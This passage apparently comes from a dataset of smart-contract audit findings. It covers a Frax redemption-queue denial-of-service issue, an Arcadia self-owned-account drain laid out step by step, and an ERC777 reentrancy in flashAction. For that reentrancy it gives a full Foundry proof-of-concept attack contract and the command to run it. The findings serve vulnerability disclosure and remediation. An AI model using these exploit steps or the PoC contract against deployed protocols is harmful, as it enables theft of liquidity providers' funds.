_redemptionQueueState.earlyExitFee\\n });\\n```\\nчEnsure that the protocol team and its users are aware of the risks of such an event and develop a contingency plan to manage it.чUsers unable to withdraw their assets. Loss of assets for the victim.ч```\\nFile: FraxEtherRedemptionQueue.sol\\n /// @notice Sets the fee for redeeming\\n /// @param _newFee New redemption fee given in percentage terms, using 1e6 precision\\n function setRedemptionFee(uint64 _newFee) external {\\n _requireSenderIsTimelock();\\n if (_newFee > FEE_PRECISION) revert ExceedsMaxRedemptionFee(_newFee, FEE_PRECISION);\\n\\n emit SetRedemptionFee({ oldRedemptionFee: redemptionQueueState.redemptionFee, newRedemptionFee: _newFee });\\n\\n redemptionQueueState.redemptionFee = _newFee;\\n }\\n```\\n -SFrxETHAdapter redemptionQueue waiting period can DOS adapter functionsчmediumчThe waiting period between `rebalancer` address making a withdrawal request and the withdrawn funds being ready to claim from `FraxEtherRedemptionQueue` is extremely long which can lead to a significant period of time where some of the protocol's functions are either unusable or work in a diminished capacity.\\nIn FraxEtherRedemptionQueue.sol; the Queue wait time is stored in the state struct `redemptionQueueState` as `redemptionQueueState.queueLengthSecs` and is curently set to `1_296_000 Seconds` or 15 Days; as recently as January however it was at `1_555_200 Seconds` or `18 Days`. View current setting by calling `redemptionQueueState()` here.\\n`BaseLSTAdapter::requestWithdrawal()` is an essential function which helps to maintain `bufferEth` at a defined, healthy level. `bufferEth` is a facility which smooth running of redemptions and deposits.\\nFor redemptions; it allows users to redeem `underlying` without having to wait for any period of time. However, redemption amounts requested which are less than `bufferEth` will be rejected as can be seen below in `BaseLSTAdapter::prefundedRedeem()`. Further, there is nothing preventing `redemptions` from bringing `bufferEth` all the way to `0`.\\n```\\n function prefundedRedeem(address recipient) external virtual returns (uint256, uint256) {\\n // SOME CODE\\n\\n // If the buffer is insufficient, shares cannot be redeemed immediately\\n // Need to wait for the withdrawal to be completed and the buffer to be refilled.\\n> if (assets > bufferEthCache) revert InsufficientBuffer();\\n\\n // SOME CODE\\n }\\n```\\n\\nFor deposits; where `bufferEth` is too low, it keeps user `deposits` in the contract until a deposit is made which brings `bufferEth` above it's target, at which point it stakes. During this time, the `deposits`, which are kept in the adapter, do not earn any yield; making those funds unprofitable.\\n```\\n function prefundedDeposit() external nonReentrant returns (uint256, uint256) {\\n // SOME CODE\\n> if (targetBufferEth >= availableEth + queueEthCache) {\\n> bufferEth = availableEth.toUint128();\\n return (assets, shares);\\n }\\n // SOME CODE\\n }\\n```\\nчConsider adding a function allowing the rebalancer call `earlyBurnRedemptionTicketNft()` in `FraxEtherRedemptionQueue.sol` when there is a necessity. This will allow an immediate withdrawal for a fee of 0.5%; see function hereчIf the `SFrxETHAdapter` experiences a large net redemption, bringing `bufferEth` significantly below `targetBufferEth`, the rebalancer can be required to make a withdrawal request in order to replenish the buffer. However, this will be an ineffective action given the current, 15 Day waiting period. During the waiting period if `redemptions > deposits`, the `bufferEth` can be brought down to `0` which will mean a complete DOSing of the `prefundedRedeem()` function.\\nDuring the wait period too; if `redemptions >= deposits`, no new funds will be staked in `FRAX` so yields for users will decrease and may in turn lead to more redemptions.\\nThese conditions could also necessitate the immediate calling again of `requestWithdrawal()`, given that withdrawal requests can only bring `bufferEth` up to it's target level and not beyond and during the wait period there could be further redemptions.ч```\\n function prefundedRedeem(address recipient) external virtual returns (uint256, uint256) {\\n // SOME CODE\\n\\n // If the buffer is insufficient, shares cannot be redeemed immediately\\n // Need to wait for the withdrawal to be completed and the buffer to be refilled.\\n> if (assets > bufferEthCache) revert InsufficientBuffer();\\n\\n // SOME CODE\\n }\\n```\\n -`AccountV1#flashActionByCreditor` can be used to drain assets from account without withdrawingчhighч`AccountV1#flashActionByCreditor` is designed to allow atomic flash actions moving funds from the `owner` of the account. By making the account own itself, these arbitrary calls can be used to transfer `ERC721` assets directly out of the account. The assets being transferred from the account will still show as deposited on the account allowing it to take out loans from creditors without having any actual assets.\\nThe overview of the exploit are as follows:\\n```\\n1) Deposit ERC721\\n2) Set creditor to malicious designed creditor\\n3) Transfer the account to itself\\n4) flashActionByCreditor to transfer ERC721\\n 4a) account owns itself so _transferFromOwner allows transfers from account\\n 4b) Account is now empty but still thinks is has ERC721\\n5) Use malicious designed liquidator contract to call auctionBoughtIn\\n and transfer account back to attacker\\n7) Update creditor to legitimate creditor\\n8) Take out loan against nothing\\n9) Profit\\n```\\n\\nThe key to this exploit is that the account is able to be it's own `owner`. Paired with a maliciously designed `creditor` (creditor can be set to anything) `flashActionByCreditor` can be called by the attacker when this is the case.\\nAccountV1.sol#L770-L772\\n```\\nif (transferFromOwnerData.assets.length > 0) {\\n _transferFromOwner(transferFromOwnerData, actionTarget);\\n}\\n```\\n\\nIn these lines the `ERC721` token is transferred out of the account. The issue is that even though the token is transferred out, the `erc721Stored` array is not updated to reflect this change.\\nAccountV1.sol#L570-L572\\n```\\nfunction auctionBoughtIn(address recipient) external onlyLiquidator nonReentrant {\\n _transferOwnership(recipient);\\n}\\n```\\n\\nAs seen above `auctionBoughtIn` does not have any requirement besides being called by the `liquidator`. Since the `liquidator` is also malicious. It can then abuse this function to set the `owner` to any address, which allows the attacker to recover ownership of the account. Now the attacker has an account that still considers the `ERC721` token as owned but that token isn't actually present in the account.\\nNow the account creditor can be set to a legitimate pool and a loan taken out against no collateral at all.чThe root cause of this issue is that the account can own itself. The fix is simple, make the account unable to own itself by causing transferOwnership to revert if `owner == address(this)`чAccount can take out completely uncollateralized loans, causing massive losses to all lending pools.ч```\\n1) Deposit ERC721\\n2) Set creditor to malicious designed creditor\\n3) Transfer the account to itself\\n4) flashActionByCreditor to transfer ERC721\\n 4a) account owns itself so _transferFromOwner allows transfers from account\\n 4b) Account is now empty but still thinks is has ERC721\\n5) Use malicious designed liquidator contract to call auctionBoughtIn\\n and transfer account back to attacker\\n7) Update creditor to legitimate creditor\\n8) Take out loan against nothing\\n9) Profit\\n```\\n -Reentrancy in flashAction() allows draining liquidity poolsчhighчIt is possible to drain a liquidity pool/creditor if the pool's asset is an ERC777 token by triggering a reentrancy flow using flash actions.\\nThe following vulnerability describes a complex flow that allows draining any liquidity pool where the underlying asset is an ERC777 token. Before diving into the vulnerability, it is important to properly understand and highlight some concepts from Arcadia that are relevant in order to allow this vulnerability to take place:\\nFlash actions: flash actions in Arcadia operate in a similar fashion to flash loans. Any account owner will be able to borrow an arbitrary amount from the creditor without putting any collateral as long as the account remains in a healthy state at the end of execution. The following steps summarize what actually happens when `LendingPool.flashAction()` flow is triggered:\\nThe amount borrowed (plus fees) will be minted to the account as debt tokens. This means that the amount borrowed in the flash action will be accounted as debt during the whole `flashAction()` execution. If a flash action borrowing 30 tokens is triggered for an account that already has 10 tokens in debt, the debt balance of the account will increase to 40 tokens + fees.\\nBorrowed asset will be transferred to the `actionTarget`. The `actionTarget` is an arbitrary address passed as parameter in the `flashAction()`. It is important to be aware of the fact that transferring the borrowed funds is performed prior to calling `flashActionByCreditor()`, which is the function that will end up verifying the account's health state. This is the step where the reentrancy will be triggered by the `actionTarget`.\\nThe account's `flashActionByCreditor()` function is called. This is the last step in the execution function, where a health check for the account is performed (among other things).\\n// LendingPool.sol\\n\\nfunction flashAction(\\n uint256 amountBorrowed,\\n address account,\\n address `actionTarget`, \\n bytes calldata actionData,\\n bytes3 referrer\\n ) external whenBorrowNotPaused processInterests {\\n ... \\n\\n uint256 amountBorrowedWithFee = amountBorrowed + amountBorrowed.mulDivUp(originationFee, ONE_4);\\n\\n ...\\n \\n // Mint debt tokens to the Account, debt must be minted before the actions in the Account are performed.\\n _deposit(amountBorrowedWithFee, account);\\n\\n ...\\n\\n // Send Borrowed funds to the `actionTarget`.\\n asset.safeTransfer(actionTarget, amountBorrowed);\\n \\n // The Action Target will use the borrowed funds (optionally with additional assets withdrawn from the Account)\\n // to execute one or more actions (swap, deposit, mint...).\\n // Next the action Target will deposit any of the remaining funds or any of the recipient token\\n // resulting from the actions back into the Account.\\n // As last step, after all assets are deposited back into the Account a final health check is done:\\n // The Collateral Value of all assets in the Account is bigger than the total liabilities against the Account (including the debt taken during this function).\\n // flashActionByCreditor also checks that the Account indeed has opened a margin account for this Lending Pool.\\n {\\n uint256 accountVersion = IAccount(account).flashActionByCreditor(actionTarget, actionData);\\n if (!isValidVersion[accountVersion]) revert LendingPoolErrors.InvalidVersion();\\n }\\n \\n ... \\n }\\nCollateral value: Each creditor is configured with some risk parameters in the `Registry` contract. One of the risk parameters is the `minUsdValue`, which is the minimum USD value any asset must have when it is deposited into an account for the creditor to consider such collateral as valid. If the asset does not reach the `minUsdValue`, it will simply be accounted with a value of 0. For example: if the `minUsdValue` configured for a given creditor is 100 USD and we deposit an asset in our account worth 99 USD (let's say 99 USDT), the USDT collateral will be accounted as 0. This means that our USDT will be worth nothing at the eyes of the creditor. However, if we deposit one more USDT token into the account, our USD collateral value will increase to 100 USD, reaching the `minUsdValue`. Now, the creditor will consider our account's collateral to be worth 100 USD instead of 0 USD.\\nLiquidations: Arcadia liquidates unhealthy accounts using a dutch-auction model. When a liquidation is triggered via `Liquidator.liquidateAccount()` all the information regarding the debt and assets from the account will be stored in `auctionInformation_` , which maps account addresses to an `AuctionInformation` struct. An important field in this struct is the `assetShares`, which will store the relative value of each asset, with respect to the total value of the Account.\\nWhen a user wants to bid for an account in liquidation, the `Liquidator.bid()` function must be called. An important feature from this function is that it does not require the bidder to repay the loan in full (thus getting the full collateral in the account). Instead, the bidder can specify which collateral asset and amount wants to obtain back, and the contract will compute the amount of debt required to be repaid from the bidder for that amount of collateral. If the user wants to repay the full loan, all the collateral in the account will be specified by the bidder.\\nWith this background, we can now move on to describing the vulnerability in full.\\nInitially, we will create an account and deposit collateral whose value is in the limit of the configured `minUsdValue` (if the `minUsdValue` is 100 tokens, the ideal amount to have will be 100 tokens to maximize gains). We will see why this is required later. The account's collateral and debt status will look like this:\\n\\nThe next step after creating the account is to trigger a flash action. As mentioned in the introduction, the borrowed funds will be sent to the `actionTarget` (this will be a contract we create and control). An important requirement is that if the borrowed asset is an ERC777 token, we will be able to execute the ERC777 callback in our `actionTarget` contract, enabling us to gain control of the execution flow. Following our example, if we borrowed 200 tokens the account's status would look like this:\\n\\nOn receiving the borrowed tokens, the actual attack will begin. TheactionTarget will trigger the `Liquidator.liquidateAccount()` function to liquidate our own account. This is possible because the funds borrowed using the flash action are accounted as debt for our account (as we can see in the previous image, the borrowed amount greatly surpasses our account's collateral value) prior to executing the `actionTarget` ERC777 callback, making the account susceptible of being liquidated. Executing this function will start the auction process and store data relevant to the account and its debt in the `auctionInformation_` mapping.\\nAfter finishing the `liquidateAccount()` execution, the next step for the `actionTarget` is to place a bid for our own account auction calling `Liquidator.bid()`. The trick here is to request a small amount from the account's collateral in the `askedAssetAmounts` array (if we had 100 tokens as collateral in the account, we could ask for only 1). The small requested amount will make the computed `price` to pay for the bid by `_calculateBidPrice()` be really small so that we can maximize our gains. Another requirement will be to set the `endAuction_` parameter to `true` (we will see why later):\\n```\\n// Liquidator.sol\\n\\nfunction bid(address account, uint256[] memory askedAssetAmounts, bool endAuction_) external nonReentrant {\\n AuctionInformation storage auctionInformation_ = auctionInformation[account];\\n if (!auctionInformation_.inAuction) revert LiquidatorErrors.NotForSale();\\n\\n // Calculate the current auction price of the assets being bought.\\n uint256 totalShare = _calculateTotalShare(auctionInformation_, askedAssetAmounts);\\n uint256 price = _calculateBidPrice(auctionInformation_, totalShare);\\n \\n // Transfer an amount of \"price\" in \"Numeraire\" to the LendingPool to repay the Accounts debt.\\n // The LendingPool will call a \"transferFrom\" from the bidder to the pool -> the bidder must approve the LendingPool.\\n // If the amount transferred would exceed the debt, the surplus is paid out to the Account Owner and earlyTerminate is True.\\n uint128 startDebt = auctionInformation_.startDebt;\\n bool earlyTerminate = ILendingPool(auctionInformation_.creditor).auctionRepay(\\n startDebt, auctionInformation_.minimumMargin, price, account, msg.sender\\n );\\n // rest of code\\n}\\n```\\n\\nAfter computing the small price to pay for the bid, theLendingPool.auctionRepay() will be called. Because we are repaying a really small amount from the debt, the `accountDebt <= amount` condition will NOT hold, so the only actions performed by `LendingPool.auctionRepay()` will be transferring the small amount of tokens to pay the bid, and `_withdraw()` (burn) the corresponding debt from the account (a small amount of debt will be burnt here because the bid amount is small). It is also important to note that the `earlyTerminate` flag will remain as false:\\n```\\n// LendingPool.sol\\n\\nfunction auctionRepay(uint256 startDebt, uint256 minimumMargin_, uint256 amount, address account, address bidder)\\n external\\n whenLiquidationNotPaused\\n onlyLiquidator \\n processInterests\\n returns (bool earlyTerminate)\\n {\\n // Need to transfer before burning debt or ERC777s could reenter.\\n // Address(this) is trusted -> no risk on re-entrancy attack after transfer.\\n asset.safeTransferFrom(bidder, address(this), amount);\\n\\n uint256 accountDebt = maxWithdraw(account); \\n if (accountDebt == 0) revert LendingPoolErrors.IsNotAnAccountWithDebt();\\n if (accountDebt <= amount) {\\n // The amount recovered by selling assets during the auction is bigger than the total debt of the Account.\\n // -> Terminate the auction and make the surplus available to the Account-Owner.\\n earlyTerminate = true;\\n unchecked {\\n _settleLiquidationHappyFlow(account, startDebt, minimumMargin_, bidder, (amount - accountDebt));\\n }\\n amount = accountDebt;\\n }\\n \\n _withdraw(amount, address(this), account); \\n\\n emit Repay(account, bidder, amount);\\n }\\n```\\n\\nAfter `LendingPool.auctionRepay()` , execution will go back to `Liquidator.bid()`. The account's `auctionBid()` function will then be called, which will transfer the 1 token requested by the bidder in the `askedAssetAmounts` parameter from the account's collateral to the bidder. This is the most important concept in the attack. Because 1 token is moving out from the account's collateral, the current collateral value from the account will be decreased from 100 USD to 99 USD, making the collateral value be under the minimum `minUsdValue` amount of 100 USD, and thus making the collateral value from the account go straight to 0 at the eyes of the creditor:\\n\\nBecause the `earlyTerminate` was NOT set to `true` in `LendingPool.auctionRepay()`, the `if (earlyTerminate)` condition will be skipped, going straight to evaluate the `else if (endAuction_)` condition . Because we set theendAuction_ parameter to `true` when calling the `bid()` function, `_settleAuction()` will execute.\\n```\\n// Liquidator.sol\\n\\nfunction bid(address account, uint256[] memory askedAssetAmounts, bool endAuction_) external nonReentrant {\\n // rest of code\\n \\n // Transfer the assets to the bidder.\\n IAccount(account).auctionBid(\\n auctionInformation_.assetAddresses, auctionInformation_.assetIds, askedAssetAmounts, msg.sender\\n );\\n // If all the debt is repaid, the auction must be ended, even if the bidder did not set endAuction to true.\\n if (earlyTerminate) {\\n // Stop the auction, no need to do a health check for the account since it has no debt anymore.\\n _endAuction(account);\\n }\\n // If not all debt is repaid, the bidder can still earn a termination incentive by ending the auction\\n // if one of the conditions to end the auction is met.\\n // \"_endAuction()\" will silently fail without reverting, if the auction was not successfully ended.\\n else if (endAuction_) {\\n if (_settleAuction(account, auctionInformation_)) _endAuction(account);\\n } \\n }\\n```\\n\\n`_settleAuction()` is where the final steps of the attack will take place. Because we made the collateral value of our account purposely decrease from the `minUsdValue`, `_settleAuction` will interpret that all collateral has been sold, and the `else if (collateralValue == 0)` will evaluate to true, making the creditor's `settleLiquidationUnhappyFlow()` function be called:\\n```\\nfunction _settleAuction(address account, AuctionInformation storage auctionInformation_)\\n internal\\n returns (bool success)\\n {\\n // Cache variables.\\n uint256 startDebt = auctionInformation_.startDebt;\\n address creditor = auctionInformation_.creditor;\\n uint96 minimumMargin = auctionInformation_.minimumMargin;\\n\\n uint256 collateralValue = IAccount(account).getCollateralValue();\\n uint256 usedMargin = IAccount(account).getUsedMargin();\\n \\n // Check the different conditions to end the auction.\\n if (collateralValue >= usedMargin || usedMargin == minimumMargin) { \\n // Happy flow: Account is back in a healthy state.\\n // An Account is healthy if the collateral value is equal or greater than the used margin.\\n // If usedMargin is equal to minimumMargin, the open liabilities are 0 and the Account is always healthy.\\n ILendingPool(creditor).settleLiquidationHappyFlow(account, startDebt, minimumMargin, msg.sender);\\n } else if (collateralValue == 0) {\\n // Unhappy flow: All collateral is sold.\\n ILendingPool(creditor).settleLiquidationUnhappyFlow(account, startDebt, minimumMargin, msg.sender);\\n }\\n // rest of code\\n \\n \\n return true;\\n }\\n```\\n\\nExecuting the `settleLiquidationUnhappyFlow()` will burn ALL the remaining debt (balanceOf[account] will return all the remaining balance of debt tokens for the account), and the liquidation will be finished, calling `_endLiquidation()` and leaving the account with 99 tokens of collateral and a 0 amount of debt (and the `actionTarget` with ALL the borrowed funds taken from the flash action).\\n```\\n// LendingPool.sol\\n\\nfunction settleLiquidationUnhappyFlow(\\n address account,\\n uint256 startDebt,\\n uint256 minimumMargin_,\\n address terminator\\n ) external whenLiquidationNotPaused onlyLiquidator processInterests {\\n // rest of code\\n\\n // Any remaining debt that was not recovered during the auction must be written off.\\n // Depending on the size of the remaining debt, different stakeholders will be impacted.\\n uint256 debtShares = balanceOf[account];\\n uint256 openDebt = convertToAssets(debtShares);\\n uint256 badDebt;\\n // rest of code\\n\\n // Remove the remaining debt from the Account now that it is written off from the liquidation incentives/Liquidity Providers.\\n _burn(account, debtShares);\\n realisedDebt -= openDebt;\\n emit Withdraw(msg.sender, account, account, openDebt, debtShares);\\n\\n _endLiquidation();\\n\\n emit AuctionFinished(\\n account, address(this), startDebt, initiationReward, terminationReward, liquidationPenalty, badDebt, 0\\n );\\n }\\n```\\n\\nAfter the actionTarget's ERC777 callback execution, the execution flow will return to the initially called `flashAction()` function, and the final `IAccount(account).flashActionByCreditor()` function will be called, which will pass all the health checks due to the fact that all the debt from the account was burnt:\\n```\\n// LendingPool.sol\\n\\nfunction flashAction(\\n uint256 amountBorrowed,\\n address account,\\n address actionTarget, \\n bytes calldata actionData,\\n bytes3 referrer\\n ) external whenBorrowNotPaused processInterests {\\n \\n // rest of code \\n \\n // The Action Target will use the borrowed funds (optionally with additional assets withdrawn from the Account)\\n // to execute one or more actions (swap, deposit, mint// rest of code).\\n // Next the action Target will deposit any of the remaining funds or any of the recipient token\\n // resulting from the actions back into the Account.\\n // As last step, after all assets are deposited back into the Account a final health check is done:\\n // The Collateral Value of all assets in the Account is bigger than the total liabilities against the Account (including the debt taken during this function).\\n // flashActionByCreditor also checks that the Account indeed has opened a margin account for this Lending Pool.\\n {\\n uint256 accountVersion = IAccount(account).flashActionByCreditor(actionTarget, actionData);\\n if (!isValidVersion[accountVersion]) revert LendingPoolErrors.InvalidVersion();\\n }\\n \\n // rest of code \\n }\\n```\\n\\n```\\n// AccountV1.sol\\n\\nfunction flashActionByCreditor(address actionTarget, bytes calldata actionData)\\n external\\n nonReentrant\\n notDuringAuction\\n updateActionTimestamp\\n returns (uint256 accountVersion)\\n {\\n \\n // rest of code\\n\\n // Account must be healthy after actions are executed.\\n if (isAccountUnhealthy()) revert AccountErrors.AccountUnhealthy();\\n\\n // rest of code\\n }\\n```\\n\\nProof of Concept\\nThe following proof of concept illustrates how the previously described attack can take place. Follow the steps in order to reproduce it:\\nCreate a `ERC777Mock.sol` file in `lib/accounts-v2/test/utils/mocks/tokens` and paste the code found in this github gist.\\nImport the ERC777Mock and change the MockOracles, MockERC20 and Rates structs in `lib/accounts-v2/test/utils/Types.sol` to add an additional `token777ToUsd`, `token777` of type ERC777Mock and `token777ToUsd` rate:\\n`import \"../utils/mocks/tokens/ERC777Mock.sol\"; // <----- Import this\\n\\n...\\n\\nstruct MockOracles {\\n ArcadiaOracle stable1ToUsd;\\n ArcadiaOracle stable2ToUsd;\\n ArcadiaOracle token1ToUsd;\\n ArcadiaOracle token2ToUsd;\\n ArcadiaOracle token3ToToken4;\\n ArcadiaOracle token4ToUsd;\\n ArcadiaOracle token777ToUsd; // <----- Add this\\n ArcadiaOracle nft1ToToken1;\\n ArcadiaOracle nft2ToUsd;\\n ArcadiaOracle nft3ToToken1;\\n ArcadiaOracle sft1ToToken1;\\n ArcadiaOracle sft2ToUsd;\\n}\\n\\nstruct MockERC20 {\\n ERC20Mock stable1;\\n ERC20Mock stable2;\\n ERC20Mock token1;\\n ERC20Mock token2;\\n ERC20Mock token3;\\n ERC20Mock token4;\\n ERC777Mock token777; // <----- Add this\\n}\\n\\n...\\n\\nstruct Rates {\\n uint256 stable1ToUsd;\\n uint256 stable2ToUsd;\\n uint256 token1ToUsd;\\n uint256 token2ToUsd;\\n uint256 token3ToToken4;\\n uint256 token4ToUsd;\\n uint256 token777ToUsd; // <----- Add this\\n uint256 nft1ToToken1;\\n uint256 nft2ToUsd;\\n uint256 nft3ToToken1;\\n uint256 sft1ToToken1;\\n uint256 sft2ToUsd;\\n}`\\nReplace the contents inside `lib/accounts-v2/test/fuzz/Fuzz.t.sol` for the code found in this github gist.\\nTo finish the setup, replace the file found in `lending-v2/test/fuzz/Fuzz.t.sol` for the code found in this github gist.\\nFor the actual proof of concept, create a `Poc.t.sol` file in `test/fuzz/LendingPool` and paste the following code. The code contains the proof of concept test, as well as the action target implementation:\\n/**\\n * Created by Pragma Labs\\n * SPDX-License-Identifier: BUSL-1.1\\n */\\npragma solidity 0.8.22;\\n\\nimport { LendingPool_Fuzz_Test } from \"./_LendingPool.fuzz.t.sol\";\\n\\nimport { ActionData, IActionBase } from \"../../../lib/accounts-v2/src/interfaces/IActionBase.sol\";\\nimport { IPermit2 } from \"../../../lib/accounts-v2/src/interfaces/IPermit2.sol\";\\n\\n/// @notice Proof of Concept - Arcadia\\ncontract Poc is LendingPool_Fuzz_Test {\\n\\n /////////////////////////////////////////////////////////////////\\n // TEST CONTRACTS //\\n /////////////////////////////////////////////////////////////////\\n\\n ActionHandler internal actionHandler;\\n bytes internal callData;\\n\\n /////////////////////////////////////////////////////////////////\\n // SETUP //\\n /////////////////////////////////////////////////////////////////\\n\\n function setUp() public override {\\n // Setup pool test\\n LendingPool_Fuzz_Test.setUp();\\n\\n // Deploy action handler\\n vm.prank(users.creatorAddress);\\n actionHandler = new ActionHandler(address(liquidator), address(proxyAccount));\\n\\n // Set origination fee\\n vm.prank(users.creatorAddress);\\n pool.setOriginationFee(100); // 1%\\n\\n // Transfer some tokens to actiontarget to perform liquidation repayment and approve tokens to be transferred to pool \\n vm.startPrank(users.liquidityProvider);\\n mockERC20.token777.transfer(address(actionHandler), 1 ether);\\n mockERC20.token777.approve(address(pool), type(uint256).max);\\n\\n // Deposit 100 erc777 tokens into pool\\n vm.startPrank(address(srTranche));\\n pool.depositInLendingPool(100 ether, users.liquidityProvider);\\n assertEq(mockERC20.token777.balanceOf(address(pool)), 100 ether);\\n\\n // Approve creditor from actiontarget for bid payment\\n vm.startPrank(address(actionHandler));\\n mockERC20.token777.approve(address(pool), type(uint256).max);\\n\\n }\\n\\n /////////////////////////////////////////////////////////////////\\n // POC //\\n /////////////////////////////////////////////////////////////////\\n /// @notice Test exploiting the reentrancy vulnerability. \\n /// Prerequisites:\\n /// - Create an actionTarget contract that will trigger the attack flow using the ERC777 callback when receiving the \\n /// borrowed funds in the flash action.\\n /// - Have some liquidity deposited in the pool in order to be able to borrow it\\n /// Attack:\\n /// 1. Open a margin account in the creditor to be exploited.\\n /// 2. Deposit a small amount of collateral. This amount needs to be big enough to cover the `minUsdValue` configured\\n /// in the registry for the given creditor.\\n /// 3. Create the `actionData` for the account's `flashAction()` function. The data contained in it (withdrawData, transferFromOwnerData,\\n /// permit, signature and actionTargetData) can be empty, given that such data is not required for the attack.\\n /// 4. Trigger LendingPool.flashAction(). The execution flow will:\\n /// a. Mint the flash-actioned debt to the account\\n /// b. Send the borrowed funds to the action target\\n /// c. The action target will execute the ERC777 `tokensReceived()` callback, which will:\\n /// - Trigger Liquidator.liquidateAccount(), which will set the account in an auction state\\n /// - Trigger Liquidator.bid(). \\n \\n function testVuln_reentrancyInFlashActionEnablesStealingAllProtocolFunds(\\n uint128 amountLoaned,\\n uint112 collateralValue,\\n uint128 liquidity,\\n uint8 originationFee\\n ) public { \\n\\n //---------- STEP 1 ----------//\\n // Open a margin account\\n vm.startPrank(users.accountOwner);\\n proxyAccount.openMarginAccount(address(pool)); \\n \\n //---------- STEP 2 ----------//\\n // Deposit 1 stable token in the account as collateral.\\n // Note: The creditors's `minUsdValue` is set to 1 * 10 ** 18. Because\\n // value is converted to an 18-decimal number and the asset is pegged to 1 dollar,\\n // depositing an amount of 1 * 10 ** 6 is the actual minimum usd amount so that the \\n // account's collateral value is not considered as 0.\\n depositTokenInAccount(proxyAccount, mockERC20.stable1, 1 * 10 ** 6);\\n assertEq(proxyAccount.getCollateralValue(), 1 * 10 ** 18);\\n\\n //---------- STEP 3 ----------//\\n // Create empty action data. The action handler won't withdraw/deposit any asset from the account \\n // when the `flashAction()` callback in the account is triggered. Hence, action data will contain empty elements.\\n callData = _buildActionData();\\n\\n // Fetch balances from the action handler (who will receive all the borrowed funds from the flash action)\\n // as well as the pool. \\n // Action handler balance initially has 1 token of `token777` (given initially on deployment)\\n assertEq(mockERC20.token777.balanceOf(address(actionHandler)), 1 * 10 ** 18);\\n uint256 liquidityPoolBalanceBefore = mockERC20.token777.balanceOf(address(pool));\\n uint256 actionHandlerBalanceBefore = mockERC20.token777.balanceOf(address(actionHandler));\\n // Pool initially has 100 tokens of `token777` (deposited by the liquidity provider in setUp())\\n assertEq(mockERC20.token777.balanceOf(address(pool)), 100 * 10 ** 18);\\n\\n //---------- STEP 4 ----------//\\n // Step 4. Trigger the flash action.\\n vm.startPrank(users.accountOwner);\\n\\n pool.flashAction(100 ether , address(proxyAccount), address(actionHandler), callData, emptyBytes3);\\n vm.stopPrank();\\n \\n \\n //---------- FINAL ASSERTIONS ----------//\\n\\n // Action handler (who is the receiver of the borrowed funds in the flash action) has succesfully obtained 100 tokens from \\n //the pool, and in the end it has nearly 101 tokens (initially it had 1 token, plus the 100 tokens stolen \\n // from the pool minus the small amount required to pay for the bid)\\n assertGt(mockERC20.token777.balanceOf(address(actionHandler)), 100 * 10 ** 18);\\n\\n // On the other hand, pool has lost nearly all of its balance, only remaining the small amount paid from the \\n // action handler in order to bid\\n assertLt(mockERC20.token777.balanceOf(address(pool)), 0.05 * 10 ** 18);\\n \\n } \\n\\n /// @notice Internal function to build the `actionData` payload needed to execute the `flashActionByCreditor()` \\n /// callback when requesting a flash action\\n function _buildActionData() internal returns(bytes memory) {\\n ActionData memory emptyActionData;\\n address[] memory to;\\n bytes[] memory data;\\n bytes memory actionTargetData = abi.encode(emptyActionData, to, data);\\n IPermit2.PermitBatchTransferFrom memory permit;\\n bytes memory signature;\\n return abi.encode(emptyActionData, emptyActionData, permit, signature, actionTargetData);\\n }\\n}\\n\\n/// @notice ERC777Recipient interface\\ninterface IERC777Recipient {\\n \\n function tokensReceived(\\n address operator,\\n address from,\\n address to,\\n uint256 amount,\\n bytes calldata userData,\\n bytes calldata operatorData\\n ) external;\\n}\\n\\n /// @notice Liquidator interface\\ninterface ILiquidator {\\n function liquidateAccount(address account) external;\\n function bid(address account, uint256[] memory askedAssetAmounts, bool endAuction_) external;\\n}\\n\\n /// @notice actionHandler contract that will trigger the attack via ERC777's `tokensReceived()` callback\\ncontract ActionHandler is IERC777Recipient, IActionBase {\\n\\n ILiquidator public immutable liquidator;\\n address public immutable account;\\n uint256 triggered;\\n\\n constructor(address _liquidator, address _account) {\\n liquidator = ILiquidator(_liquidator);\\n account = _account;\\n } \\n\\n /// @notice ERC777 callback function\\n function tokensReceived(\\n address operator,\\n address from,\\n address to,\\n uint256 amount,\\n bytes calldata userData,\\n bytes calldata operatorData\\n ) external {\\n // Only trigger the callback once (avoid triggering it while receiving funds in the setup + when receiving final funds)\\n if(triggered == 1) {\\n triggered = 2;\\n liquidator.liquidateAccount(account);\\n uint256[] memory askedAssetAmounts = new uint256[](1);\\n askedAssetAmounts[0] = 1; // only ask for 1 wei of token so that we repay a small share of the debt\\n liquidator.bid(account, askedAssetAmounts, true);\\n }\\n unchecked{\\n triggered++;\\n }\\n }\\n\\n function executeAction(bytes calldata actionTargetData) external returns (ActionData memory) {\\n ActionData memory data;\\n return data;\\n }\\n\\n}\\nExecute the proof of concept with the following command (being inside the `lending-v2` folder): `forge test --mt testVuln_reentrancyInFlashActionEnablesStealingAllProtocolFunds`чThis attack is possible because the `getCollateralValue()` function returns a 0 collateral value due to the `minUsdValue` mentioned before not being reached after executing the bid. The Liquidator's `_settleAuction()` function then believes the collateral held in the account is 0.\\nIn order to mitigate the issue, consider fetching the actual real collateral value inside `_settleAuction()` even if it is less than the `minUsdValue` held in the account, so that the function can properly check if the full collateral was sold or not.\\n```\\n// Liquidator.sol\\nfunction _settleAuction(address account, AuctionInformation storage auctionInformation_)\\n internal\\n returns (bool success)\\n {\\n // rest of code\\n\\n uint256 collateralValue = IAccount(account).getCollateralValue(); // <----- Fetch the REAL collateral value instead of reducing it to 0 if `minUsdValue` is not reached\\n \\n \\n // rest of code\\n }\\n```\\nчThe impact for this vulnerability is high. All funds deposited in creditors with ERC777 tokens as the underlying asset can be drained.ч```\\n// Liquidator.sol\\n\\nfunction bid(address account, uint256[] memory askedAssetAmounts, bool endAuction_) external nonReentrant {\\n AuctionInformation storage auctionInformation_ = auctionInformation[account];\\n if (!auctionInformation_.inAuction) revert LiquidatorErrors.NotForSale();\\n\\n // Calculate the current auction price of the assets being bought.\\n uint256 totalShare = _calculateTotalShare(auctionInformation_, askedAssetAmounts);\\n uint256 price = _calculateBidPrice(auctionInformation_, totalShare);\\n \\n // Transfer an amount of \"price\" in \"Numeraire\" to the LendingPool to repay the Accounts debt.\\n // The LendingPool will call a \"transferFrom\" from the bidder to the pool -> the bidder must approve the LendingPool.\\n // If the amount transferred would exceed the debt, the surplus is paid out to the Account Owner and earlyTerminate is True.\\n uint128 startDebt = auctionInformation_.startDebt;\\n bool earlyTerminate = ILendingPool(auctionInformation_.creditor).auctionRepay(\\n startDebt, auctionInformation_.minimumMargin, price, account, msg.sender\\n );\\n // rest of code\\n}\\n```\\n -Caching Uniswap position liquidity allows borrowing using undercollateralized Uni positionsчhighчIt is possible to fake 